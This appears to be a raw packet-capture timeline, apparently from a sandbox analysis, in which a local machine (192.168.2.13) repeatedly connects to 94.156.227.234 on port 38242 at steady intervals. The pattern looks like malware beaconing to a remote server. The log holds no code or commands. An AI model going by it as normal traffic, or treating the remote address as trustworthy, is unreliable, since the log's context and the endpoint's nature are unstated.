                                                                          Dec 24, 2024 05:28:53.860965967 CET4462438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:53.980750084 CET382424462494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:53.981009960 CET4462438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:53.981059074 CET4462438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:54.100902081 CET382424462494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:54.485896111 CET4462438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:54.648022890 CET382424462494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:55.103219032 CET382424462494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:55.103570938 CET4462438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:55.487166882 CET4462638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:55.606779099 CET382424462694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:55.606870890 CET4462638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:55.606930017 CET4462638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:55.726430893 CET382424462694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:56.112381935 CET4462638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:56.271960020 CET382424462694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:56.746936083 CET382424462694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:56.747163057 CET4462638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:57.113624096 CET4462838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:57.234519958 CET382424462894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:57.234776974 CET4462838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:57.234930992 CET4462838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:57.354581118 CET382424462894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:57.739813089 CET4462838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:57.907946110 CET382424462894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:58.351490974 CET382424462894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:58.351728916 CET4462838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:58.740813017 CET4463038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:58.860374928 CET382424463094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:58.860574007 CET4463038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:58.860574007 CET4463038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:58.980654955 CET382424463094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:59.365550995 CET4463038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:59.528068066 CET382424463094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:00.002441883 CET382424463094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:00.002619028 CET4463038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:00.366797924 CET4463238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:00.486421108 CET382424463294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:00.486640930 CET4463238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:00.486640930 CET4463238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:00.606194019 CET382424463294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:00.990895033 CET4463238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:01.151977062 CET382424463294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:01.610100985 CET382424463294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:01.610408068 CET4463238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:01.992147923 CET4463438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:02.111676931 CET382424463494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:02.111896992 CET4463438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:02.111896992 CET4463438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:02.231492996 CET382424463494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:02.617213011 CET4463438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:02.779942989 CET382424463494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:03.234157085 CET382424463494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:03.234426975 CET4463438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:03.618489981 CET4463638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:03.843857050 CET382424463694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:03.843974113 CET4463638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:03.844014883 CET4463638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:03.963742971 CET382424463694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:04.348941088 CET4463638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:04.511936903 CET382424463694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:04.960860014 CET382424463694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:04.960995913 CET4463638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:05.350024939 CET4463838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:05.469613075 CET382424463894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:05.469871044 CET4463838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:05.469919920 CET4463838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:05.589620113 CET382424463894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:05.974813938 CET4463838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:06.140196085 CET382424463894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:06.596740007 CET382424463894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:06.597084045 CET4463838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:06.976134062 CET4464038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:07.095838070 CET382424464094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:07.096034050 CET4464038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:07.096079111 CET4464038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:07.215634108 CET382424464094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:07.601772070 CET4464038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:07.767932892 CET382424464094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:08.221237898 CET382424464094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:08.221501112 CET4464038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:08.603452921 CET4464238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:08.723090887 CET382424464294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:08.723491907 CET4464238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:08.723491907 CET4464238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:08.843059063 CET382424464294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:09.230655909 CET4464238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:09.391916037 CET382424464294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:09.851248026 CET382424464294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:09.851464987 CET4464238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:10.232333899 CET4464438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:10.351937056 CET382424464494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:10.352165937 CET4464438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:10.352165937 CET4464438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:10.471776962 CET382424464494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:10.860002041 CET4464438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:11.019947052 CET382424464494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:11.490439892 CET382424464494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:11.490612030 CET4464438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:11.861601114 CET4464638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:11.981117964 CET382424464694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:11.981215000 CET4464638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:11.981261969 CET4464638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:12.101768017 CET382424464694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:12.489012003 CET4464638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:12.655894995 CET382424464694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:13.096177101 CET382424464694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:13.096409082 CET4464638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:13.490763903 CET4464838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:13.610383987 CET382424464894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:13.610523939 CET4464838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:13.610591888 CET4464838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:13.730097055 CET382424464894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:14.118036985 CET4464838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:14.283910036 CET382424464894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:14.741466999 CET382424464894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:14.741784096 CET4464838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:15.119482994 CET4465038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:15.239384890 CET382424465094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:15.239537001 CET4465038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:15.239729881 CET4465038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:15.359222889 CET382424465094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:15.747396946 CET4465038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:15.908008099 CET382424465094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:16.362529993 CET382424465094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:16.362746000 CET4465038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:16.749005079 CET4465238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:16.868997097 CET382424465294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:16.869278908 CET4465238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:16.869278908 CET4465238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:16.989029884 CET382424465294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:17.376133919 CET4465238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:17.535938025 CET382424465294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:17.987345934 CET382424465294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:17.987606049 CET4465238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:18.377795935 CET4465438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:18.497700930 CET382424465494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:18.497942924 CET4465438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:18.497942924 CET4465438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:18.617794037 CET382424465494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:19.003376007 CET4465438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:19.163995028 CET382424465494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:19.622859001 CET382424465494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:19.623224020 CET4465438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:20.004821062 CET4465638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:20.124567032 CET382424465694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:20.124818087 CET4465638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:20.124818087 CET4465638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:20.245019913 CET382424465694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:20.630902052 CET4465638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:20.791975021 CET382424465694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:21.249562979 CET382424465694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:21.249824047 CET4465638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:21.632813931 CET4465838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:21.752386093 CET382424465894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:21.752528906 CET4465838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:21.752664089 CET4465838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:21.872162104 CET382424465894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:22.260143995 CET4465838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:22.419935942 CET382424465894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:22.877867937 CET382424465894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:22.878180027 CET4465838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:23.261596918 CET4466038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:23.381299973 CET382424466094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:23.381468058 CET4466038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:23.381469011 CET4466038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:23.501136065 CET382424466094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:23.888921022 CET4466038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:24.055864096 CET382424466094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:24.505650043 CET382424466094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:24.505776882 CET4466038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:24.890543938 CET4466238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:25.010473967 CET382424466294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:25.010674000 CET4466238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:25.010674000 CET4466238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:25.130323887 CET382424466294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:25.516931057 CET4466238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:25.683953047 CET382424466294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:26.133501053 CET382424466294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:26.133755922 CET4466238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:26.518516064 CET4466438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:26.638156891 CET382424466494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:26.638303041 CET4466438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:26.638348103 CET4466438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:26.758057117 CET382424466494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:27.148089886 CET4466438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:27.312033892 CET382424466494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:27.774501085 CET382424466494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:27.774861097 CET4466438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:28.149974108 CET4466638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:28.269629955 CET382424466694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:28.269802094 CET4466638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:28.269969940 CET4466638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:28.389607906 CET382424466694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:28.778737068 CET4466638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:28.940054893 CET382424466694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:29.391726971 CET382424466694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:29.391860962 CET4466638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:29.780668974 CET4466838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:29.901276112 CET382424466894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:29.901401997 CET4466838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:29.901508093 CET4466838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:30.021015882 CET382424466894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:30.409575939 CET4466838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:30.571861029 CET382424466894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:31.026477098 CET382424466894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:31.026757956 CET4466838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:31.410976887 CET4467038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:31.530755043 CET382424467094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:31.530920029 CET4467038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:31.531002045 CET4467038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:31.650609016 CET382424467094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:32.039879084 CET4467038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:32.207854986 CET382424467094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:32.651896954 CET382424467094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:32.652057886 CET4467038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:33.041729927 CET4467238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:33.161150932 CET382424467294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:33.161381960 CET4467238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:33.161465883 CET4467238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:33.327727079 CET382424467294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:33.669249058 CET4467238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:33.831945896 CET382424467294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:34.334634066 CET382424467294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:34.334798098 CET4467238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:34.670975924 CET4467438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:34.790838957 CET382424467494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:34.791085958 CET4467438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:34.791198969 CET4467438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:34.910828114 CET382424467494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:35.299726009 CET4467438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:35.463903904 CET382424467494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:35.931371927 CET382424467494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:35.931643009 CET4467438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:36.301610947 CET4467638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:36.422072887 CET382424467694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:36.422373056 CET4467638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:36.422569036 CET4467638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:36.544240952 CET382424467694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:36.931427956 CET4467638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:37.095905066 CET382424467694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:37.550368071 CET382424467694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:37.550647974 CET4467638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:37.933303118 CET4467838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:38.053008080 CET382424467894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:38.053158998 CET4467838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:38.053158998 CET4467838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:38.172852039 CET382424467894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:38.560163021 CET4467838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:38.723853111 CET382424467894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:39.178186893 CET382424467894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:39.178447008 CET4467838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:39.563420057 CET4468038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:39.683372974 CET382424468094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:39.683746099 CET4468038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:39.683793068 CET4468038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:39.803672075 CET382424468094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:40.195521116 CET4468038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:40.360054016 CET382424468094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:40.802954912 CET382424468094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:40.803284883 CET4468038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:41.197227001 CET4468238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:41.316814899 CET382424468294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:41.316942930 CET4468238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:41.317008972 CET4468238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:41.436728954 CET382424468294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:41.824088097 CET4468238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:41.983865023 CET382424468294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:42.482986927 CET382424468294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:42.483093023 CET4468238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:42.825664043 CET4468438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:42.945319891 CET382424468494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:42.945508003 CET4468438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:42.945553064 CET4468438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:43.065129995 CET382424468494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:43.452754974 CET4468438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:43.619999886 CET382424468494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:44.083754063 CET382424468494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:44.083918095 CET4468438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:44.454462051 CET4468638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:44.574122906 CET382424468694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:44.574217081 CET4468638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:44.574217081 CET4468638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:44.693842888 CET382424468694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:45.081438065 CET4468638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:45.243805885 CET382424468694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:45.685631037 CET382424468694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:45.685842037 CET4468638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:46.083197117 CET4468838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:46.202812910 CET382424468894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:46.203049898 CET4468838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:46.203133106 CET4468838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:46.322849989 CET382424468894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:46.710931063 CET4468838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:46.871972084 CET382424468894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:47.340629101 CET382424468894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:47.340745926 CET4468838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:47.712666988 CET4469038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:47.832231045 CET382424469094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:47.832362890 CET4469038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:47.832385063 CET4469038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:47.952512026 CET382424469094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:48.339735031 CET4469038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:48.503909111 CET382424469094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:48.952991009 CET382424469094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:48.953279018 CET4469038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:49.341232061 CET4469238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:49.460932970 CET382424469294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:49.461064100 CET4469238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:49.461097002 CET4469238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:49.580945969 CET382424469294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:49.965456009 CET4469238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:50.127959967 CET382424469294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:50.587523937 CET382424469294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:50.587640047 CET4469238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:50.966505051 CET4469438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:51.086456060 CET382424469494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:51.086766958 CET4469438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:51.086766958 CET4469438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:51.206511021 CET382424469494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:51.592108965 CET4469438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:51.752648115 CET382424469494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:52.221775055 CET382424469494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:52.222007990 CET4469438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:52.593132973 CET4469638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:52.712958097 CET382424469694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:52.713238001 CET4469638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:52.713272095 CET4469638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:52.832895994 CET382424469694.156.227.234192.168.2.13
